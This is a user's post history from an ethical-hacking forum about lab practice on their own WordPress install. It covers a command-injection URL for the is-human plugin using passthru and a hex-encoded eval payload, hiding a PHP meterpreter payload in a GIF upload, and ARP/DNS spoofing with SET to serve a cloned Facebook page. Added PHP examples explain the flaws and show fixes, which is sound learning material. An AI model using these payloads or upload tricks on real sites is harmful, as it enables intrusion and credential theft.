EH-Net
  Show Posts
1  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: PHP in GIF file. on: July 26, 2011, 04:54:44 AM
I appreciate the level of confidence being shown in regards to my intellect!
The screenshot posted is the plugin functionality, and I'm using the plugin version specified in the exploit, tturner. I can't see where I have specified using the newest plugin version, as this obviously would be patched.

I will be trying some more and update if i find a solution.
2  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: PHP in GIF file. on: July 25, 2011, 01:46:23 PM
1. I am allowed to upload .jpg/.gif etc. to that folder as it is a profile picture plugin, and with regular pictures it works. The files appear in the folder.
2. If I try to upload anything else I get an error saying it's the wrong format.
3. If I change the content header in the media stream upon upload (file extension is .PHP) it says that the picture was uploaded and is awaiting confirmation. Which probably means that it passed the "extension" check and all should be good. However, the file is not there.
4. I uploaded a jpg pic now, downloaded the processed picture and added my shell code to the end of it. Using the content header I can upload it with no problems.
Although it does not end up in the directory.

If you read the exploit description this upload method should work. BUT I am doing something wrong of course since it's not working...

THANKS for all the input so far!
3  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: PHP in GIF file. on: July 25, 2011, 12:47:08 PM
Hi again.

I just tested renaming the file to .gif and it works. So there is something wrong with my content type change, I guess.
4  Ethical Hacking Discussions and Related Certifications / Web Applications / PHP in GIF file. on: July 25, 2011, 08:06:49 AM
Hi again. I'm trying out the exploit http://www.exploit-db.com/exploits/16181/.
I made a PHP payload in meterpreter (which works) and want to upload it to my WordPress site using the vuln described in exploit-db.

I edited the file header with the hex code provided in the exploit, as so:


Then I'm using WebScarab to intercept the POST command and edit the content-type to "image/gif". The file I'm uploading is of course a .php file.
The upload is somewhat successful as I don't get the usual error message telling me it's the wrong filetype:



However, when checking my directory there are no files being uploaded.
Does anyone know the reason for this? I don't think it's the filesize as my payload (php) is 1.28K. Did I miss something?

I'm thinking I'm missing some size definition of my picture maybe?
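The upload path the post describes, as an added example for this thread (it is not the poster's code, the profile-picture plugin's code, or the exploit-db entry): a PHP script that reproduces the three checks such an uploader commonly applies (file extension, declared Content-Type, magic bytes) and a structure-aware rewrite of the GIF, to show which step a PHP payload appended after the image's trailer survives. The 1x1 GIF, the payload string, the file name and the allowlists are constructed for the example; whether the plugin on the page re-encodes uploads is not stated there and is treated as an assumption.

```php
<?php
declare(strict_types=1);

// Added example, not code from the thread, the plugin or exploit-db.
// Reproduces three common upload checks and a structure-aware GIF rewrite
// to show where a payload appended after the GIF trailer is lost.
// The GIF bytes, payload, file name and allowlists below are constructed.

const ALLOWED_EXTENSIONS = ['gif', 'jpg', 'jpeg', 'png'];
const ALLOWED_MIME       = ['image/gif', 'image/jpeg', 'image/png'];

// Smallest valid GIF89a: 1x1 pixel, two-entry global colour table.
function sample_gif(): string
{
    return 'GIF89a'
        . "\x01\x00\x01\x00"                          // logical screen 1x1
        . "\x80\x00\x00"                              // packed byte: global colour table, 2 entries
        . "\x00\x00\x00\xff\xff\xff"                  // colour table: black, white
        . "\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  // image descriptor 1x1, no local table
        . "\x02\x02\x44\x01\x00"                      // LZW min code size 2; one sub-block; terminator
        . "\x3b";                                     // trailer
}

// Check 1: file name extension, chosen by the uploader.
function extension_ok(string $name): bool
{
    return in_array(strtolower(pathinfo($name, PATHINFO_EXTENSION)), ALLOWED_EXTENSIONS, true);
}

// Check 2: Content-Type from the multipart body, also chosen by the uploader.
function content_type_ok(string $declared): bool
{
    return in_array($declared, ALLOWED_MIME, true);
}

// Check 3: header parse as getimagesize() does it. Bytes appended after the
// trailer do not disturb the header, so this still passes.
function magic_ok(string $bytes): bool
{
    $info = @getimagesizefromstring($bytes);
    return $info !== false && in_array($info[2], [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG], true);
}

// Walk the GIF block structure and return the bytes up to and including the
// trailer (0x3B). Anything after the trailer is not part of the image.
function gif_without_trailing_data(string $bytes): ?string
{
    $len = strlen($bytes);
    if ($len < 13 || !in_array(substr($bytes, 0, 6), ['GIF87a', 'GIF89a'], true)) {
        return null;
    }
    // Length-prefixed data sub-blocks, ended by a 0x00 block.
    $skipSubBlocks = function (int $p) use ($bytes, $len): ?int {
        while ($p < $len) {
            $n = ord($bytes[$p++]);
            if ($n === 0) {
                return $p;
            }
            $p += $n;
        }
        return null;
    };
    $pos = 13;                                       // header + logical screen descriptor
    if (ord($bytes[10]) & 0x80) {                    // global colour table present
        $pos += 3 * (2 ** ((ord($bytes[10]) & 0x07) + 1));
    }
    while ($pos < $len) {
        $block = ord($bytes[$pos++]);
        if ($block === 0x3B) {
            return substr($bytes, 0, $pos);
        }
        if ($block === 0x21) {                       // extension: label byte, then sub-blocks
            $pos = $skipSubBlocks($pos + 1);
        } elseif ($block === 0x2C) {                 // image descriptor: 9 bytes, optional local table, LZW data
            if ($pos + 9 > $len) {
                return null;
            }
            $packed = ord($bytes[$pos + 8]);
            $pos += 9;
            if ($packed & 0x80) {
                $pos += 3 * (2 ** (($packed & 0x07) + 1));
            }
            $pos = $skipSubBlocks($pos + 1);         // +1 skips the LZW minimum code size byte
        } else {
            return null;                             // unknown block: reject rather than guess
        }
        if ($pos === null) {
            return null;
        }
    }
    return null;                                     // no trailer: malformed
}

$upload = sample_gif() . '<?php echo "appended code"; ';

$results = [
    'extension check'         => extension_ok('avatar.gif'),
    'content-type check'      => content_type_ok('image/gif'),
    'magic-byte check'        => magic_ok($upload),
    'payload in stored bytes' => strpos($upload, '<?php') !== false,
];
$rewritten = gif_without_trailing_data($upload);
$results['payload after rewrite'] = $rewritten !== null && strpos($rewritten, '<?php') !== false;
var_export($results);
```

Run with PHP 7.1 or later. The file-name and Content-Type checks pass because both values are chosen by the uploader, and the magic-byte check passes because getimagesize() reads only the header. The rewrite keeps only the bytes up to the trailer, so anything appended after a finished image is lost; a GD round trip (imagecreatefromgif() followed by imagegif()) drops it the same way and also discards extension blocks, which this block copier keeps. An uploader that stores the file under a server-chosen name with a fixed extension outside the web root removes the question of whether the payload survives at all.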
5  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Wordpress plugin exploit on: July 25, 2011, 03:54:52 AM
Hi again guys,
I tried the stuff you said and I'm somewhat convinced this should work! However it doesn't! It's most likely me doing something wrong...

I tried a lot of stuff like (ipconfig):

http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru("\x65\x72\x72\x6f\x72\x5f\x72\x65\x70\x6f\x72\x74\x69\x6e\x67\x28\x30\x29\x3b\x65\x63\x68\x6f\x20\x40\x69\x6e\x63\x6c\x75\x64\x65\x28\x24\x5f\x50\x4f\x53\x54\x5b\x22\x69\x70\x63\x6f\x6e\x66\x69\x67\x22\x5d\x29\x3b");error

Tried both POST/GET just to check it out.
I also tried various variants of the base64 with different function calls.
Errors are turned off.

Most of the time I'm getting this error message:

Parse error: syntax error, unexpected '"', expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Removing apostrophes gives me:
Parse error: syntax error, unexpected T_NS_SEPARATOR, expecting T_STRING in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Any clues? 
Btw, that "HaXxd00r" was pure awesomeness =)
6  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: Wordpress plugin exploit on: July 24, 2011, 03:19:35 PM
Hehe. Absolutely way cooler in hex!! I really appreciate the feedback!
I will be testing this at work tomorrow and tell you how it went!
Much obliged!
7  Ethical Hacking Discussions and Related Certifications / Web Applications / Re: XSS Attack - Busting Browsers to Root! on: July 24, 2011, 03:15:20 PM
Great Video! Thanks.
8  Ethical Hacking Discussions and Related Certifications / Web Applications / Wordpress plugin exploit on: July 22, 2011, 05:38:22 AM
Hi,
I'm playing around with my WordPress installation trying out various exploits found on exploit-db. However, I'm pretty new to pentesting web applications.

I'm trying out this:  http://www.exploit-db.com/exploits/17299/

Running "http://localhost/wp-content/plugins/is-human/engine.php?action=log-reset&type=ih_options();passthru(ipconfig);error" gives me the ipconfig of the local machine no problems.

However, I would like to get spacing in there. I tried URL encoding (like ipconfig%20/all) but that didn't seem to work. I'd like to do "dir C:\" for example. Also, could I run other types of code in there to upload a php backdoor, or connect and download it from ftp to the webroot or similar?

Any help please?

Error message using URL encoding:

Deprecated: Function set_magic_quotes_runtime() is deprecated in C:\xampp\htdocs\wp-settings.php on line 32
Array
Warning: Division by zero in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: passthru() [function.passthru]: Cannot execute a blank command in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1

Warning: error_log() expects at least 1 parameter, 0 given in C:\xampp\htdocs\wp-content\plugins\is-human\engine.php(29) : eval()'d code on line 1
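The injection the post describes, as an added example for this thread (not the is-human plugin's source and not the exploit-db entry). The vulnerable function is a reconstruction from the error lines quoted above and is an assumption about the real file: the type parameter is eval()'d with "_log();" appended, which is why the payload ends in error (it becomes the real function error_log()) and why an unquoted space inside passthru() produces the division-by-zero and blank-command warnings. The stand-in functions ih_options() and ih_options_log(), and the three inputs, are constructed for the example.

```php
<?php
declare(strict_types=1);

// Added example, not the is-human plugin's source. The vulnerable shape is an
// assumption reconstructed from the error text in the post: the request
// parameter is eval()'d with "_log();" appended. Stand-in functions and inputs
// are constructed for the example.

// Stand-ins for plugin functions the legitimate request and the payload call.
function ih_options(): array
{
    return ['log' => []];
}

function ih_options_log(): void
{
    echo "options log reset\n";
}

// Vulnerable: the GET parameter is concatenated into PHP source and eval()'d.
function vulnerable_log_reset(string $type): string
{
    ob_start();
    try {
        eval($type . '_log();');
    } catch (\Throwable $e) {
        echo get_class($e), ': ', $e->getMessage(), "\n";
    }
    return (string) ob_get_clean();
}

// Hardened: the parameter selects a handler from an allowlist. No source is
// built from request data and nothing is eval()'d.
function hardened_log_reset(string $type): string
{
    $handlers = ['ih_options' => 'ih_options_log'];
    if (!array_key_exists($type, $handlers)) {
        throw new InvalidArgumentException("unknown log type: $type");
    }
    ob_start();
    $handlers[$type]();
    return (string) ob_get_clean();
}

// Values as they would arrive in $_GET['type'] after URL decoding (constructed).
$inputs = [
    'ih_options',                                      // legitimate value
    'ih_options();passthru("echo injected");error',    // quoted argument: command runs, then error_log() gets no arguments
    'ih_options();passthru(ipconfig /all);error',      // unquoted space: parsed as a division of two undefined constants
];

foreach ($inputs as $type) {
    echo "type parameter : ", $type, "\n";
    echo "eval()'d source: ", $type, "_log();\n";
    echo "vulnerable     : ", vulnerable_log_reset($type);
    try {
        echo "hardened       : ", hardened_log_reset($type);
    } catch (InvalidArgumentException $e) {
        echo "hardened       : rejected (", $e->getMessage(), ")\n";
    }
    echo "\n";
}
```

The second input quotes the command, which is what a space in the argument needs once the URL-decoded parameter has become PHP source: %20 survives decoding, but passthru(ipconfig /all) is read by the parser as an expression, not as a string. The hardened version never builds source from the request; the parameter selects a handler from a fixed map and anything else is rejected.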
9  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Best honeypot? on: March 14, 2011, 11:17:47 AM
Hi,
I'm wondering what is the best honeypot to date considering these criteria:
- Logging functionality
- Detection of port scans
- Exploit identification
- Notifications/alerts
- Services "offered"

We've had some strange behaviour on some of our webservers causing the systems to crash with a certain event ID which matches the behaviour of some recent exploit... So I would appreciate any good advice!
10  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Wireless honeypot on: February 16, 2011, 07:04:41 AM
And yeah, I know you can do this by using the ettercap "autoadd" function! But I don't want ARP spoofing at all =)
11  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Wireless honeypot on: February 16, 2011, 05:54:38 AM
Hi guys,

I've been playing around with cracking my WEP, ARP spoofing and SSLstrip, which is awesome.
However, what if I wanted to "reverse" the process to create a honeypot? Let's say I create a WEP network which gets hacked, and I would want to identify the hacker by, for example, Facebook.
Having the router forward all packets incoming on port 80/443 to port 5555 on my computer running SSLstrip/ettercap, which then forwards the traffic to port 80/443 on my router and out to the internet. Would that work? I would like to eliminate the ARP spoof process.

Also, does anyone have any better ideas? I was thinking of port mirroring but that wouldn't eliminate the SSL if I'm not mistaken.

Maybe a simple solution is setting up a computer with 2 NICs?
12  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Social Engineering Toolkit on: October 20, 2010, 11:54:24 AM
Hi,

First of all, I didn't want to put this in the SET section as it seems to be a DNS problem.
When using SET with the web attack (java) I can't seem to get the ARP/DNS spoofing to be stable. I have a server running on my BT4 machine which ARP/DNS spoofs the entire subnet. When a user enters, for example, facebook, the victim should be redirected to my cloned facebook server and get a java "certificate". However, I can't seem to get this to work properly. (Entering the IP works, but the ARP/DNS fails.)

I'm using the integrated ettercap function in SET, but when trying to recreate the scenario it failed, so I tried spoofing manually with ettercap as well. But now I can't get it to work at all. Any clues?



Edit: My BT4 machine (not VMware) is on a WPA2 network together with a Windows 7 machine. When performing ARP spoofing with ettercap it seems to work at random times and not very often. Is this some wireless issue or anything else?
13  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: Masters Degree on: September 08, 2010, 02:46:32 PM
Ziggy: I haven't been looking at anything specific yet. Just trying to get an overview of what's out there. I would prefer something on the east coast though, such as NY or FL.
14  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Masters Degree on: September 08, 2010, 02:11:58 PM
Hi,

I'm looking to take an MSc in information security or something similar.
I live in Norway now but am planning on taking my MSc in the US.
Can anybody point me in the direction of some universities that are well known for their courses?

15  Ethical Hacking Discussions and Related Certifications / Network Pen Testing / Re: MITM in domain on: August 07, 2010, 08:24:40 AM
Yeah, I know, but I'm not sure what kind of "security" is added when you have, let's say, a 2008 server with 2 NICs (1 ext, 1 int) and you go out on the internet. And what happens if you spoof a client before logging into the domain: will you be able to sniff the password, and will it be a successful login, etc.?
© 2013 The Ethical Hacker Network